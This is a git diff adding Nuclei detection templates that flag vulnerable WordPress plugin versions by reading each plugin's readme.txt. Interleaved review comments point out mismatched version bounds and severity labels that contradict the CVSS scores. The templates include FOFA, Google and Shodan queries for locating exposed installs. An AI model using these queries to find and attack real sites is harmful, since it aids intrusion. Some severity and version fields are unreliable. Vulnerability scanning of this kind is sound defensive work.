+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3256da87-0d37-4c8f-9bac-95e3017e35d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-6493
+ metadata:
+ fofa-query: "wp-content/plugins/header-footer-code/"
+ google-query: inurl:"/wp-content/plugins/header-footer-code/"
+ shodan-query: 'vuln:CVE-2024-6493'
+ tags: cve,wordpress,wp-plugin,header-footer-code,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "header-footer-code"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
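Review bot: `name` gives the affected range as `< 1.2`, but the dsl matcher tests `compare_versions(version, '<= 1.1')`; if the plugin ever shipped a 1.1.x point release it falls inside the advisory's range yet fails this check, so the template under-reports exactly the installs it is meant to catch. Using the advisory's own bound, `- compare_versions(version, '< 1.2')`, closes the gap with no other change; the identical line appears in CVE-2024-6617 in this commit and needs the same treatment.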
diff --git a/poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml b/poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml
new file mode 100644
index 0000000000..a3dad1bfd0
--- /dev/null
+++ b/poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6499-506582290ab27969bbad70e6796d3810
+
+info:
+ name: >
+ WordPress Button Plugin MaxButtons <= 9.7.8 - Full Path Disclosure
+ author: topscoder
+ severity: medium
+ description: >
+ The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 9.7.8. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/fdd0694c-ea7e-4cf8-a8d8-82a2b02fecdf?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-6499
+ metadata:
+ fofa-query: "wp-content/plugins/maxbuttons/"
+ google-query: inurl:"/wp-content/plugins/maxbuttons/"
+ shodan-query: 'vuln:CVE-2024-6499'
+ tags: cve,wordpress,wp-plugin,maxbuttons,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/maxbuttons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "maxbuttons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 9.7.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml b/poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml
new file mode 100644
index 0000000000..c5c1018556
--- /dev/null
+++ b/poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65
+
+info:
+ name: >
+ NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting via CSS Styles
+ author: topscoder
+ severity: low
+ description: >
+ The NinjaTeam Header Footer Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via CSS styles in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/521af15c-983c-49dc-a90b-b090281db78a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-6617
+ metadata:
+ fofa-query: "wp-content/plugins/header-footer-code/"
+ google-query: inurl:"/wp-content/plugins/header-footer-code/"
+ shodan-query: 'vuln:CVE-2024-6617'
+ tags: cve,wordpress,wp-plugin,header-footer-code,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "header-footer-code"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml b/poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml
new file mode 100644
index 0000000000..27ad15b265
--- /dev/null
+++ b/poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7
+
+info:
+ name: >
+ ImageRecycle pdf & image compression <= 3.1.14 - Missing Authorization in Several AJAX Actions
+ author: topscoder
+ severity: low
+ description: >
+ The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 3.1.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform unauthorized actions, such as updating plugin settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f330bf36-0a39-40d6-a075-c87fdb9dc2da?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
+ cvss-score: 5
+ cve-id: CVE-2024-6631
+ metadata:
+ fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/"
+ google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/"
+ shodan-query: 'vuln:CVE-2024-6631'
+ tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "imagerecycle-pdf-image-compression"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.14')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml b/poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml
new file mode 100644
index 0000000000..6655caeaf8
--- /dev/null
+++ b/poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625
+
+info:
+ name: >
+ KBucket: Your Curated Content in WordPress <= 4.1.5 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The KBucket: Your Curated Content in WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'yt_apikey' parameter in all versions up to, and including, 4.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ff5094a-8cf2-4c18-921d-7ec31d60c13a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-6665
+ metadata:
+ fofa-query: "wp-content/plugins/kbucket/"
+ google-query: inurl:"/wp-content/plugins/kbucket/"
+ shodan-query: 'vuln:CVE-2024-6665'
+ tags: cve,wordpress,wp-plugin,kbucket,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kbucket"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.1.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml b/poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml
new file mode 100644
index 0000000000..55ddf96859
--- /dev/null
+++ b/poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6
+
+info:
+ name: >
+ KBucket: Your Curated Content in WordPress <= 4.1.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The KBucket: Your Curated Content in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 4.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b37087a4-83b2-4355-89f0-6ff0aa8d0013?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-6667
+ metadata:
+ fofa-query: "wp-content/plugins/kbucket/"
+ google-query: inurl:"/wp-content/plugins/kbucket/"
+ shodan-query: 'vuln:CVE-2024-6667'
+ tags: cve,wordpress,wp-plugin,kbucket,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kbucket"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.1.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7258.yaml b/poc/cve/CVE-2024-7258.yaml
new file mode 100644
index 0000000000..11886ed40b
--- /dev/null
+++ b/poc/cve/CVE-2024-7258.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7258
+
+info:
+ name: >
+ WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary Feed Actions
+ author: topscoder
+ severity: low
+ description: >
+ The WooCommerce Google Feed Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 2.8.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform various feed actions, such as deleting a feed, duplicating a feed, and changing the status of a feed.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6b8fac8f-619a-442e-8b8f-43a0c0a44b07?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-7258
+ metadata:
+ fofa-query: "wp-content/plugins/wp-product-feed-manager/"
+ google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/"
+ shodan-query: 'vuln:CVE-2024-7258'
+ tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-product-feed-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml b/poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml
new file mode 100644
index 0000000000..85d0bb2865
--- /dev/null
+++ b/poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250
+
+info:
+ name: >
+ Simple Job Board <= 2.12.3 - Authenticated (Editor+) PHP Object Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Simple Job Board plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.12.3 via deserialization of untrusted input when editing job applications. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba6312b9-1b66-4b4f-a78d-515fa4aab63b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-7351
+ metadata:
+ fofa-query: "wp-content/plugins/simple-job-board/"
+ google-query: inurl:"/wp-content/plugins/simple-job-board/"
+ shodan-query: 'vuln:CVE-2024-7351'
+ tags: cve,wordpress,wp-plugin,simple-job-board,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-job-board/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-job-board"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.12.3')
\ No newline at end of file
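Review bot: `severity: low` (echoed by the trailing `low` in `tags`) contradicts `cvss-score: 7.2` with `C:H/I:H/A:H` metrics a few lines above; 7.2 is High on the CVSS v3.1 qualitative scale, and since severity and tags are what users filter on, this finding would be silently dropped from any `-severity high` run. Either the severity or the score is wrong, and the tags line should be regenerated to match whichever is corrected. The same score/severity conflict is present in `poc/cve/CVE-2024-7559.yaml` (8.8 vs low), `poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml` (9.6 vs medium), `poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml` (5.6 vs critical) and `poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml` (8.8 vs low).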
diff --git a/poc/cve/CVE-2024-7559.yaml b/poc/cve/CVE-2024-7559.yaml
new file mode 100644
index 0000000000..ce111b150d
--- /dev/null
+++ b/poc/cve/CVE-2024-7559.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7559
+
+info:
+ name: >
+ File Manager Pro <= 8.3.7 - Authenticated (Subscriber+) Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The File Manager Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in the mk_file_folder_manager AJAX action in all versions up to, and including, 8.3.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4b45791-4b85-4a2d-8019-1d438bd694cb?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7559
+ metadata:
+ fofa-query: "wp-content/plugins/wp-file-manager-pro/"
+ google-query: inurl:"/wp-content/plugins/wp-file-manager-pro/"
+ shodan-query: 'vuln:CVE-2024-7559'
+ tags: cve,wordpress,wp-plugin,wp-file-manager-pro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-file-manager-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-file-manager-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 8.3.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml b/poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml
new file mode 100644
index 0000000000..d55119432d
--- /dev/null
+++ b/poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7
+
+info:
+ name: >
+ Favicon Generator <= 1.5 - Cross-Site Request Forgery to Arbitrary File Deletion
+ author: topscoder
+ severity: medium
+ description: >
+ The Favicon Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the output_sub_admin_page_0 function. This makes it possible for unauthenticated attackers to delete arbitrary files on the server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The plugin author deleted the functionality of the plugin to patch this issue and close the plugin, we recommend seeking an alternative to this plugin.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6eb3ad80-3510-4018-91af-b733ef62e28f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
+ cvss-score: 9.6
+ cve-id: CVE-2024-7568
+ metadata:
+ fofa-query: "wp-content/plugins/favicon-generator/"
+ google-query: inurl:"/wp-content/plugins/favicon-generator/"
+ shodan-query: 'vuln:CVE-2024-7568'
+ tags: cve,wordpress,wp-plugin,favicon-generator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/favicon-generator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "favicon-generator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml b/poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml
new file mode 100644
index 0000000000..924306604c
--- /dev/null
+++ b/poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8
+
+info:
+ name: >
+ App Builder – Create Native Android & iOS Apps On The Flight <= 4.3.3 - Unauthenticated Limited SQL Injection via app-builder-search
+ author: topscoder
+ severity: critical
+ description: >
+ The App Builder – Create Native Android & iOS Apps On The Flight plugin for WordPress is vulnerable to limited SQL Injection via the ‘app-builder-search’ parameter in all versions up to, and including, 4.2.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b43371a6-bcb5-4418-b5a5-85879775010c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 5.6
+ cve-id: CVE-2024-7651
+ metadata:
+ fofa-query: "wp-content/plugins/app-builder/"
+ google-query: inurl:"/wp-content/plugins/app-builder/"
+ shodan-query: 'vuln:CVE-2024-7651'
+ tags: cve,wordpress,wp-plugin,app-builder,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/app-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "app-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.3.3')
\ No newline at end of file
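Review bot: The description states the injection affects `all versions up to, and including, 4.2.6`, while the `name` and the dsl matcher `compare_versions(version, '<= 4.3.3')` use 4.3.3; one of the two bounds is wrong, and if 4.2.6 is the real one, installs of 4.2.7 through 4.3.3 are reported as vulnerable after the fix shipped. The Wordfence entry referenced in the hunk should settle which bound is correct, and the `name`, `description` and dsl line need to agree on it. The `cvss-metrics` string (`AC:H`, `C:L/I:L/A:L`) also does not describe an unauthenticated SQL injection scored as `critical`, so the classification block deserves a second look against the same source.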
diff --git a/poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml b/poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml
new file mode 100644
index 0000000000..b7f14d6b9e
--- /dev/null
+++ b/poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7656-cc628b96623048172302ddea18aada71
+
+info:
+ name: >
+ Image Hotspot by DevVN <= 1.2.5 - Authenticated (Author+) PHP Object Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Image Hotspot by DevVN plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.5 via deserialization of untrusted input in the 'devvn_ihotspot_shortcode_func' function. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/624bdb9e-6c50-4a00-9a04-1a32c938d48b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7656
+ metadata:
+ fofa-query: "wp-content/plugins/devvn-image-hotspot/"
+ google-query: inurl:"/wp-content/plugins/devvn-image-hotspot/"
+ shodan-query: 'vuln:CVE-2024-7656'
+ tags: cve,wordpress,wp-plugin,devvn-image-hotspot,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/devvn-image-hotspot/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "devvn-image-hotspot"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml b/poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml
new file mode 100644
index 0000000000..0c4b80cd0b
--- /dev/null
+++ b/poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1
+
+info:
+ name: >
+ ImageRecycle pdf & image compression <= 3.1.14 - Cross-Site Request in Several AJAX Actions
+ author: topscoder
+ severity: medium
+ description: >
+ The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.14. This is due to missing or incorrect nonce validation on several functions in the class/class-image-otimizer.php file. This makes it possible for unauthenticated attackers to update plugin settings along with performing other actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a06bba7f-0259-4b87-b3fe-6ad8318fda7d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
+ cvss-score: 4.7
+ cve-id: CVE-2024-8120
+ metadata:
+ fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/"
+ google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/"
+ shodan-query: 'vuln:CVE-2024-8120'
+ tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "imagerecycle-pdf-image-compression"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.14')
\ No newline at end of file
